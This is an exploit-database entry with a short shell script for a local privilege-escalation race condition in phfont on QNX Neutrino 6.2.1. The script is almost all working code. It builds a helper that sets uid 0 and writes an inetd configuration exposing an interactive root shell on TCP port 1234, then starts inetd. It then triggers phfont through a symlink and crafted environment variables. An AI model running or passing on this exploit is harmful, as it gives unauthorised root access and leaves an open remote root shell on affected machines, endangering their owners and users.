QNX Neutrino 6.2.1 (phfont) Race Condition Local Root Exploit

2006-02-08T00:00:00
ID 1337DAY-ID-7514
Type zdt
Reporter kokanin
Modified 2006-02-08T00:00:00

Description

Exploit for QNX platform in category local exploits

                                        
=============================================================
QNX Neutrino 6.2.1 (phfont) Race Condition Local Root Exploit
=============================================================


#!/bin/sh
# [email protected] 18/10/2003
# $ cksum /usr/photon/bin/phfont
# 4123428723      30896 /usr/photon/bin/phfont
# $ uname -a
# QNX localhost 6.2.1 2003/01/08-14:50:46est x86pc x86 
cat > phfontphf.c << __EOF__
int main(){
setuid(0);
system("echo 1234 stream tcp nowait root  /bin/sh       sh -i>/tmp/dsr && /usr/sbin/inetd /tmp/dsr");
} 
__EOF__
make phfontphf >/dev/null
ln -s /usr/photon/bin/phfont ./phfont
export PHFONT=hello
export PHOTON2_PATH=mom
./phfont
rm phfont*



